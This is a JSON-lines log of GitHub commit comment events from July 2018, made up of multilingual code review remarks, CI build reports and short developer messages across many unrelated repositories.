{"id":"8041226635","type":"CommitCommentEvent","actor":{"login":"khos2ow"},"repo":{"name":"cloudops/cca-website"},"payload":{"comment":{"id":29896633,"position":2,"line":1,"path":"themes/cca-general/layouts/partials/homepage/intro-card.html","commit_id":"a30c6283c3a0bbb9531b9b5e52d4a3cfd38079f6","created_at":"2018-07-31T01:40:01Z","updated_at":"2018-07-31T01:40:01Z","author_association":"CONTRIBUTOR","body":"but anyway the new landing page looks really awesome! :+1: "}},"created_at":"2018-07-31T01:40:01Z"}
{"id":"8041227110","type":"CommitCommentEvent","actor":{"login":"gujiangjiang"},"repo":{"name":"syscl/XPS9350-macOS"},"payload":{"comment":{"id":29896636,"position":null,"line":null,"path":null,"commit_id":"41aa4becc6a1860c7fb2fce18ebd17ba872a7582","created_at":"2018-07-31T01:40:12Z","updated_at":"2018-07-31T01:40:12Z","author_association":"NONE","body":"AppleALC1.3.0是否无法使用？"}},"created_at":"2018-07-31T01:40:12Z"}
{"id":"8041228761","type":"CommitCommentEvent","actor":{"login":"wusatosi"},"repo":{"name":"ProjectFK/Blog-Frontend"},"payload":{"comment":{"id":29896637,"position":null,"line":null,"path":null,"commit_id":"9dd77d700589c25a95282230853bfdaeb18db2e9","created_at":"2018-07-31T01:40:49Z","updated_at":"2018-07-31T01:40:49Z","author_association":"MEMBER","body":"please utilize the power of webpack"}},"created_at":"2018-07-31T01:40:49Z"}
{"id":"8041249041","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29896683,"position":61,"line":413,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"434a0d173c451cafa6815aca8d0093f7724f66d7","created_at":"2018-07-31T01:47:51Z","updated_at":"2018-07-31T01:47:51Z","author_association":"COLLABORATOR","body":"Oh, I did that when I was trying to move a factor of `GRID_SIZE**2` out of the shift-n-save. I'll fix it and see if I can sort out my auto-correlation problems."}},"created_at":"2018-07-31T01:47:51Z"}
{"id":"8041249447","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29896687,"position":null,"line":null,"path":null,"commit_id":"f1900720a1569a082d2233336e808d43c00ba78c","created_at":"2018-07-31T01:48:00Z","updated_at":"2018-07-31T01:48:00Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/f1900720a1569a082d2233336e808d43c00ba78c)\n\nBuilt at __20180731 - 01:48:00__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 556s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 847s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 925s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 210s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 587s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 275s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 339s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 396s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 423s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 292s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1203s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 263s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 420s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 713s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/deposit_authed_bug/1//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 643s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-31T01:48:00Z"}
{"id":"8041251331","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"CJAponte/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896698,"position":null,"line":null,"path":null,"commit_id":"bd6e87ad22a0608f5775cbd0bbeaaa4513391a00","created_at":"2018-07-31T01:48:44Z","updated_at":"2018-07-31T01:48:44Z","author_association":"NONE","body":"Hey Cesar, I like the work. Everything looks great beside the top img, but I'm sure you got that down in your lost work. Great job!"}},"created_at":"2018-07-31T01:48:44Z"}
{"id":"8041256421","type":"CommitCommentEvent","actor":{"login":"KapiX"},"repo":{"name":"LibreOffice/core"},"payload":{"comment":{"id":29896709,"position":82,"line":155,"path":"vcl/qt5/Qt5Bitmap.cxx","commit_id":"ef46981023becba0f34a235a3571028dd0ea8838","created_at":"2018-07-31T01:50:42Z","updated_at":"2018-07-31T01:50:42Z","author_association":"CONTRIBUTOR","body":"Shouldn't these be changed to `static_cast`s? This fails on 32-bit Haiku:\r\nhttps://eu.hpkg.haiku-os.org/buildmaster/master/x86_gcc2/logviewer.html?buildruns/1594/builds/28719.log"}},"created_at":"2018-07-31T01:50:42Z"}
{"id":"8041259285","type":"CommitCommentEvent","actor":{"login":"Sija"},"repo":{"name":"crystal-lang/crystal"},"payload":{"comment":{"id":29896718,"position":27,"line":348,"path":"src/io/memory.cr","commit_id":"2703311232467767144ca7f83196c0e6fe4d24b4","created_at":"2018-07-31T01:51:50Z","updated_at":"2018-07-31T01:51:50Z","author_association":"CONTRIBUTOR","body":"Needless `()`"}},"created_at":"2018-07-31T01:51:50Z"}
{"id":"8041262180","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"CJAponte/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896726,"position":null,"line":null,"path":null,"commit_id":"bd6e87ad22a0608f5775cbd0bbeaaa4513391a00","created_at":"2018-07-31T01:52:50Z","updated_at":"2018-07-31T01:52:50Z","author_association":"NONE","body":"Also, before the 1:1 on Saturday, please rewrite your answers to the answers.md file :)"}},"created_at":"2018-07-31T01:52:50Z"}
{"id":"8041264516","type":"CommitCommentEvent","actor":{"login":"ValentinAlexandrovich"},"repo":{"name":"alextsk/cv-markup"},"payload":{"comment":{"id":29896731,"position":null,"line":null,"path":null,"commit_id":"028eead2c19b146dbf75bb25432b1d89fef5c08e","created_at":"2018-07-31T01:53:41Z","updated_at":"2018-07-31T01:53:41Z","author_association":"COLLABORATOR","body":"Подход с присвоением маржинов элементам блоков верный, но нужно применить его ко всем всем блокам, а также именование этих элементов должно соответсвовать БЭМ."}},"created_at":"2018-07-31T01:53:41Z"}
{"id":"8041268210","type":"CommitCommentEvent","actor":{"login":"Mmiaoshu"},"repo":{"name":"Mmiaoshu/HelloWord"},"payload":{"comment":{"id":29896739,"position":1,"line":1,"path":"first.java","commit_id":"a80be6e12eabebc8d36e54ea3fbd753ac1ac3316","created_at":"2018-07-31T01:55:06Z","updated_at":"2018-07-31T01:55:06Z","author_association":"OWNER","body":"qwertyuio"}},"created_at":"2018-07-31T01:55:06Z"}
{"id":"8041274117","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"davereichardt/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896756,"position":null,"line":null,"path":null,"commit_id":"0b1ad8c242f29991729a0b01cdf75aebf5e5ff38","created_at":"2018-07-31T01:57:12Z","updated_at":"2018-07-31T01:57:12Z","author_association":"NONE","body":"Great job on the answers, David!"}},"created_at":"2018-07-31T01:57:12Z"}
{"id":"8041278088","type":"CommitCommentEvent","actor":{"login":"Raymondgrc"},"repo":{"name":"davereichardt/Sprint-Challenge--User-Interface"},"payload":{"comment":{"id":29896765,"position":74,"line":209,"path":"css/index.css","commit_id":"6d1c0ab7e69d5da2a6858438c570d04587ca4535","created_at":"2018-07-31T01:58:41Z","updated_at":"2018-07-31T01:58:41Z","author_association":"NONE","body":"There are a bunch of ids here. Why did you use them instead of classes?"}},"created_at":"2018-07-31T01:58:41Z"}
{"id":"8041281257","type":"CommitCommentEvent","actor":{"login":"kyungthe"},"repo":{"name":"kyungthe/algorithm_practice_1"},"payload":{"comment":{"id":29896773,"position":null,"line":null,"path":null,"commit_id":"ead2d21de32c9244e0b973c83d3d3b8218f2c415","created_at":"2018-07-31T01:59:46Z","updated_at":"2018-07-31T01:59:46Z","author_association":"OWNER","body":"로그에 오타가 있습니다.\r\n\r\n1334page -> 134page"}},"created_at":"2018-07-31T01:59:46Z"}
{"id":"8041281424","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29896774,"position":206,"line":159,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-31T01:59:49Z","updated_at":"2018-07-31T01:59:49Z","author_association":"OWNER","body":"i didn't want to prejudice against the second reveal call, making it more expensive. "}},"created_at":"2018-07-31T01:59:49Z"}
{"id":"8043029669","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29901340,"position":null,"line":null,"path":null,"commit_id":"9434908f43bfe4e3ad466be85e2e115990b32a2f","created_at":"2018-07-31T10:00:04Z","updated_at":"2018-07-31T10:00:04Z","author_association":"CONTRIBUTOR","body":"> Also reason why this is even important. Many aoes have a spell attribute CANT_TARGET_SELF. If you pass a target with self to castspell, then checkcast will prevent this spell from going off, because that attribute checks whether you are mistakenly targeting yourself.\r\n\r\nThat's a valid point. Let's call it point 1.\r\n\r\n> TARGET_CASTER_COORDINATES supplies SOURCE_LOCATION if I recall correctly, \r\n\r\nThis is correct.\r\n\r\n> which tends to be used with a TARGET_B that searches for aoe targets. (since there are no source location executed effects)\r\n\r\nSo you are saying that TargetB is filled later on after this part of the code based on SOURCE_LOCATION provided by TargetA, so this is harmless to pass a nullptr target to castspell at this point as real targets are evaluated later on. Is my understanding correct?\r\n\r\nThis also prevent a cast failed if caster is picked as target at early stage (see point 1) but in this case, why do you change the target to nullptr only in trigger aura code? Is it already ok elsewhere?"}},"created_at":"2018-07-31T10:00:04Z"}
{"id":"8043042076","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29901368,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-31T10:02:17Z","updated_at":"2018-07-31T10:02:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-31T10:02:17Z"}
{"id":"8043043088","type":"CommitCommentEvent","actor":{"login":"cala"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29901369,"position":null,"line":null,"path":null,"commit_id":"fc4aadef02c12da6c60a519dd2df66f8c56bb0e2","created_at":"2018-07-31T10:02:29Z","updated_at":"2018-07-31T10:02:29Z","author_association":"CONTRIBUTOR","body":"Ok, Prince Malchezaar Axes make sense in that case. With this approach they might be one NPC in Zul'Gurub with similar behaviour. I have to check.\r\n\r\nThank you for clarifying. :+1: "}},"created_at":"2018-07-31T10:02:29Z"}
{"id":"8043043139","type":"CommitCommentEvent","actor":{"login":"monotek"},"repo":{"name":"zammad/zammad"},"payload":{"comment":{"id":29901370,"position":13,"line":241,"path":"contrib/packager.io/functions","commit_id":"4a610346ccee0dab0067c40bfdaf22d79da5649b","created_at":"2018-07-31T10:02:29Z","updated_at":"2018-07-31T10:02:29Z","author_association":"MEMBER","body":"fixed in: https://github.com/zammad/zammad/commit/59b8ccde1f69ad23e2e2da3c634b2e873a43924f"}},"created_at":"2018-07-31T10:02:29Z"}
{"id":"8043047323","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"awssat/laravel-visits"},"payload":{"comment":{"id":29901376,"position":22,"line":51,"path":"src/Visits.php","commit_id":"d7ff826f58011dfd0549f087f6ad157034b51705","created_at":"2018-07-31T10:03:11Z","updated_at":"2018-07-31T10:03:11Z","author_association":"NONE","body":"You can make a fallback check , something like: \r\n\r\n```\r\n$config = config('bareq') ?: config('visits');\r\n```\r\n\r\nThen you can remove the `register()` method from `BareqServiceProvider.php`:\r\n\r\n```\r\n\r\n    /**\r\n     * Register any package services.\r\n     *\r\n     * @return void\r\n     */\r\n    public function register()\r\n    {\r\n        $this->mergeConfigFrom(\r\n            __DIR__.'/config/visits.php', 'bareq'\r\n        );\r\n    }\r\n```\r\n"}},"created_at":"2018-07-31T10:03:11Z"}
{"id":"8043052735","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"fabric8-launcher/demo-cloud-app-creator"},"payload":{"comment":{"id":29901394,"position":14,"line":58,"path":"src/t2-design/DiagramWithSteps.js","commit_id":"2ecbae08ee0cfe517717708b542f3d175341b6e8","created_at":"2018-07-31T10:04:14Z","updated_at":"2018-07-31T10:04:14Z","author_association":"CONTRIBUTOR","body":"Btw, did you know you can do: `const change = { [name]: value };` in a single statement?"}},"created_at":"2018-07-31T10:04:14Z"}
{"id":"8043058741","type":"CommitCommentEvent","actor":{"login":"muafzal"},"repo":{"name":"kassambara/r2excel"},"payload":{"comment":{"id":29901411,"position":null,"line":null,"path":null,"commit_id":"dcbb9087183fd718092e113fb28a59f7fb809c6e","created_at":"2018-07-31T10:05:24Z","updated_at":"2018-07-31T10:05:24Z","author_association":"NONE","body":"Hello,\r\nthanks for making nice package. I used it once. Now I am trying to use it again on new machine, an error message while running \"install_github(\"kassambara/r2excel\")\" appears like \"Installation failed: Command failed (1)\".\r\nPlease suggest a solution.\r\nRegards\r\nMuhammad"}},"created_at":"2018-07-31T10:05:24Z"}
{"id":"8043060110","type":"CommitCommentEvent","actor":{"login":"FilipDominec"},"repo":{"name":"bonderado/python-meep-install"},"payload":{"comment":{"id":29901416,"position":null,"line":null,"path":null,"commit_id":"e1dfc7adfdc4d6a1d80be0f7bc3f5f935dc0f57e","created_at":"2018-07-31T10:05:39Z","updated_at":"2018-07-31T10:05:39Z","author_association":"NONE","body":"Thank you, I added this to my project. "}},"created_at":"2018-07-31T10:05:39Z"}
{"id":"8043065250","type":"CommitCommentEvent","actor":{"login":"Anarchid"},"repo":{"name":"ZeroK-RTS/Zero-K-Infrastructure"},"payload":{"comment":{"id":29901427,"position":12,"line":35,"path":"ZkLobbyServer/autohost/Commands/CmdMap.cs","commit_id":"b2cbd037ffd6821ae430b290973519d745f8e9ac","created_at":"2018-07-31T10:06:38Z","updated_at":"2018-07-31T10:06:38Z","author_association":"MEMBER","body":"\"Such a one\" is a meme and not a grammar rule.\r\n"}},"created_at":"2018-07-31T10:06:38Z"}
{"id":"8043067687","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29901436,"position":null,"line":null,"path":null,"commit_id":"877b9244b0c19b10921cb2807a7629051388071c","created_at":"2018-07-31T10:07:07Z","updated_at":"2018-07-31T10:07:07Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 568](https://ci.hashicorp.engineering/viewLog.html?buildId=107915&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 02:51:30"}},"created_at":"2018-07-31T10:07:07Z"}
{"id":"8043067698","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29901435,"position":null,"line":null,"path":null,"commit_id":"98d8f25d4679612c593f994942288146348d00a3","created_at":"2018-07-31T10:07:07Z","updated_at":"2018-07-31T10:07:07Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 569](https://ci.hashicorp.engineering/viewLog.html?buildId=107916&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-31T10:07:07Z"}
{"id":"8043068041","type":"CommitCommentEvent","actor":{"login":"Tdual"},"repo":{"name":"Tdual/matrixflow"},"payload":{"comment":{"id":29901437,"position":null,"line":null,"path":null,"commit_id":"3e45502b18581d492849ac3ae7b579e77a3c9de7","created_at":"2018-07-31T10:07:11Z","updated_at":"2018-07-31T10:07:11Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [make it possible to change the number of images per page.](https://trello.com/c/pJ9AsQFg/55-make-it-possible-to-change-the-number-of-images-per-page)"}},"created_at":"2018-07-31T10:07:11Z"}
{"id":"8043068136","type":"CommitCommentEvent","actor":{"login":"dpfaffenbauer"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29901438,"position":14,"line":168,"path":"bundles/AdminBundle/Controller/Admin/IndexController.php","commit_id":"5230c341cade43eca24226b221ca7a871f0013eb","created_at":"2018-07-31T10:07:12Z","updated_at":"2018-07-31T10:07:12Z","author_association":"CONTRIBUTOR","body":"thats right, wasn't sure to be honest.\r\n\r\nbut `$this->container->hasParameter` is faster then as well"}},"created_at":"2018-07-31T10:07:12Z"}
{"id":"8043068879","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29901441,"position":null,"line":null,"path":null,"commit_id":"98d8f25d4679612c593f994942288146348d00a3","created_at":"2018-07-31T10:07:21Z","updated_at":"2018-07-31T10:07:21Z","author_association":"COLLABORATOR","body":"TeamCity Solution Engineering / Packer Templates [Build 569](https://ci.hashicorp.engineering/viewLog.html?buildId=107916&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:13"}},"created_at":"2018-07-31T10:07:21Z"}
{"id":"8043070919","type":"CommitCommentEvent","actor":{"login":"evk0"},"repo":{"name":"iroot/fibonacci_nodejs"},"payload":{"comment":{"id":29901444,"position":14,"line":38,"path":"app.js","commit_id":"2b7b530928a2054bc541fdda965527934fa29a21","created_at":"2018-07-31T10:07:45Z","updated_at":"2018-07-31T10:07:45Z","author_association":"NONE","body":"Для единообразия с определением других функций лучше использовать другой синтаксис:\r\nasync function downloadFile(){...}"}},"created_at":"2018-07-31T10:07:45Z"}
{"id":"8043075543","type":"CommitCommentEvent","actor":{"login":"evk0"},"repo":{"name":"iroot/fibonacci_nodejs"},"payload":{"comment":{"id":29901453,"position":38,"line":62,"path":"app.js","commit_id":"2b7b530928a2054bc541fdda965527934fa29a21","created_at":"2018-07-31T10:08:37Z","updated_at":"2018-07-31T10:08:37Z","author_association":"NONE","body":"Что, если переменная content будет содержать пару гигабайт?"}},"created_at":"2018-07-31T10:08:37Z"}
{"id":"8043078584","type":"CommitCommentEvent","actor":{"login":"Kozova1"},"repo":{"name":"Kozova1/Parsec-Integration-With-RetroPie"},"payload":{"comment":{"id":29901458,"position":null,"line":null,"path":null,"commit_id":"b5fcd5ad6f6e4dbcb6741d61d87cd9314c7c7b8f","created_at":"2018-07-31T10:09:14Z","updated_at":"2018-07-31T10:09:14Z","author_association":"OWNER","body":"@wolfinpdx It's included now, re-run the script"}},"created_at":"2018-07-31T10:09:14Z"}
{"id":"8043083749","type":"CommitCommentEvent","actor":{"login":"Stoupedog"},"repo":{"name":"night/BetterTTV"},"payload":{"comment":{"id":29901468,"position":null,"line":null,"path":null,"commit_id":"2346fb057848faa2ee232ae965ee1f42c450e247","created_at":"2018-07-31T10:10:13Z","updated_at":"2018-07-31T10:10:13Z","author_association":"CONTRIBUTOR","body":"Closes #3135 "}},"created_at":"2018-07-31T10:10:13Z"}
{"id":"8043085030","type":"CommitCommentEvent","actor":{"login":"u-fischer"},"repo":{"name":"u-fischer/lua-font-pond"},"payload":{"comment":{"id":29901469,"position":null,"line":null,"path":null,"commit_id":"3b60d41ce4e388be01828f07f09d597de5cf8af7","created_at":"2018-07-31T10:10:28Z","updated_at":"2018-07-31T10:10:28Z","author_association":"OWNER","body":"@zauguin  This commit breaks miktex. `texmf_casefold_search` isn't defined there and so one get the error message \r\n\r\n~~~\r\nluaotfload | load :     ├ù \"...pond/texmf/tex/luatex/luaotfload/luaotfload-database.lua:624: attempt to index a nil value\".\r\n~~~\r\n\r\nThe code should better test that `kpse.var_value'texmf_casefold_search'` returns something sensible. "}},"created_at":"2018-07-31T10:10:28Z"}
{"id":"8043088645","type":"CommitCommentEvent","actor":{"login":"dhivya284"},"repo":{"name":"dhivya284/beginner"},"payload":{"comment":{"id":29901472,"position":null,"line":null,"path":null,"commit_id":"c34548213554a16108460898d0ddb2b5050d203a","created_at":"2018-07-31T10:11:11Z","updated_at":"2018-07-31T10:11:11Z","author_association":"OWNER","body":"#include<stdio.h>\r\nint main()\r\n{\r\nint a;\r\nprintf(\"enter the element\");\r\nscanf(\"%d\",&a);\r\nif(a>0)\r\n{\r\n\tprintf(\"positive\");\r\n}\r\nelse if(a<0)\r\n{\r\n\tprintf(\"negative\");\r\n}\r\nelse\r\n{\r\n\tprintf(\"zero\");\r\n}\r\n}"}},"created_at":"2018-07-31T10:11:11Z"}
{"id":"8043089175","type":"CommitCommentEvent","actor":{"login":"yashvijaysingh"},"repo":{"name":"yashvijaysingh/yash_kaggleSoluions"},"payload":{"comment":{"id":29901474,"position":null,"line":null,"path":null,"commit_id":"16144e23ecf5018d7e78da8655b693df7a3e04ae","created_at":"2018-07-31T10:11:17Z","updated_at":"2018-07-31T10:11:17Z","author_association":"OWNER","body":"Kaggle_BulldozerSalesPrediction"}},"created_at":"2018-07-31T10:11:17Z"}
{"id":"8043090675","type":"CommitCommentEvent","actor":{"login":"evk0"},"repo":{"name":"iroot/fibonacci_nodejs"},"payload":{"comment":{"id":29901477,"position":40,"line":64,"path":"app.js","commit_id":"2b7b530928a2054bc541fdda965527934fa29a21","created_at":"2018-07-31T10:11:37Z","updated_at":"2018-07-31T10:11:37Z","author_association":"NONE","body":"переменная content имеет тип Buffer, прямое указание кодировки может быть некорректным для бинарных данных (тот же png). Посмотри документацию на Buffer, Stream, fs.readFile."}},"created_at":"2018-07-31T10:11:37Z"}
{"id":"8043099755","type":"CommitCommentEvent","actor":{"login":"akhsunna"},"repo":{"name":"Vita1ik/foot_calculator"},"payload":{"comment":{"id":29901496,"position":4,"line":4,"path":"spec/ingredient_spec.rb","commit_id":"c5b38d8944cf5d29f8f05bf83176076f298f7e86","created_at":"2018-07-31T10:13:26Z","updated_at":"2018-07-31T10:13:26Z","author_association":"NONE","body":"spaces"}},"created_at":"2018-07-31T10:13:26Z"}
{"id":"8043107630","type":"CommitCommentEvent","actor":{"login":"jonaprieto"},"repo":{"name":"banacorn/agda-mode"},"payload":{"comment":{"id":29901512,"position":null,"line":null,"path":null,"commit_id":"dc0242967117e65bbc3881aab51b0755f110bec0","created_at":"2018-07-31T10:14:58Z","updated_at":"2018-07-31T10:14:58Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-31T10:14:58Z"}
{"id":"8043109621","type":"CommitCommentEvent","actor":{"login":"akhsunna"},"repo":{"name":"Vita1ik/foot_calculator"},"payload":{"comment":{"id":29901519,"position":4,"line":4,"path":"spec/ingredient_spec.rb","commit_id":"c5b38d8944cf5d29f8f05bf83176076f298f7e86","created_at":"2018-07-31T10:15:20Z","updated_at":"2018-07-31T10:15:20Z","author_association":"NONE","body":"this variable is used only inside the first context, so will be better to put this line inside that context"}},"created_at":"2018-07-31T10:15:20Z"}
{"id":"8043114837","type":"CommitCommentEvent","actor":{"login":"xuebin105"},"repo":{"name":"Lutz2015/vueArm"},"payload":{"comment":{"id":29901527,"position":null,"line":null,"path":null,"commit_id":"4e8b8ea1d4f88b63fb7b9ab0957b8c395c2198ee","created_at":"2018-07-31T10:16:22Z","updated_at":"2018-07-31T10:16:22Z","author_association":"COLLABORATOR","body":"test index "}},"created_at":"2018-07-31T10:16:22Z"}
{"id":"8043116066","type":"CommitCommentEvent","actor":{"login":"Lutz2015"},"repo":{"name":"Lutz2015/vueArm"},"payload":{"comment":{"id":29901531,"position":null,"line":null,"path":null,"commit_id":"4e8b8ea1d4f88b63fb7b9ab0957b8c395c2198ee","created_at":"2018-07-31T10:16:35Z","updated_at":"2018-07-31T10:16:35Z","author_association":"OWNER","body":"qqq"}},"created_at":"2018-07-31T10:16:35Z"}
{"id":"8043116662","type":"CommitCommentEvent","actor":{"login":"BenjaminRueth"},"repo":{"name":"precice/precice"},"payload":{"comment":{"id":29901534,"position":106,"line":90,"path":"src/partition/ProvidedPartition.cpp","commit_id":"34dbbc49026c473d7cb5a90671873008c5350de1","created_at":"2018-07-31T10:16:43Z","updated_at":"2018-07-31T10:16:43Z","author_association":"MEMBER","body":"Put an assertion here? `assertion(globalVertexCounter != -1)`"}},"created_at":"2018-07-31T10:16:43Z"}
{"id":"8043119003","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29901539,"position":13,"line":13,"path":"lesson3/route.rb","commit_id":"39c5261db340871f2f66cb19774b734d5b5d5643","created_at":"2018-07-31T10:17:12Z","updated_at":"2018-07-31T10:17:12Z","author_association":"NONE","body":"в задании:\r\n\"Может удалять **промежуточную** станцию из списка\"\r\nэтот метод удалит **любую** станцию, в том числе начальную и конечную, что неверно"}},"created_at":"2018-07-31T10:17:12Z"}
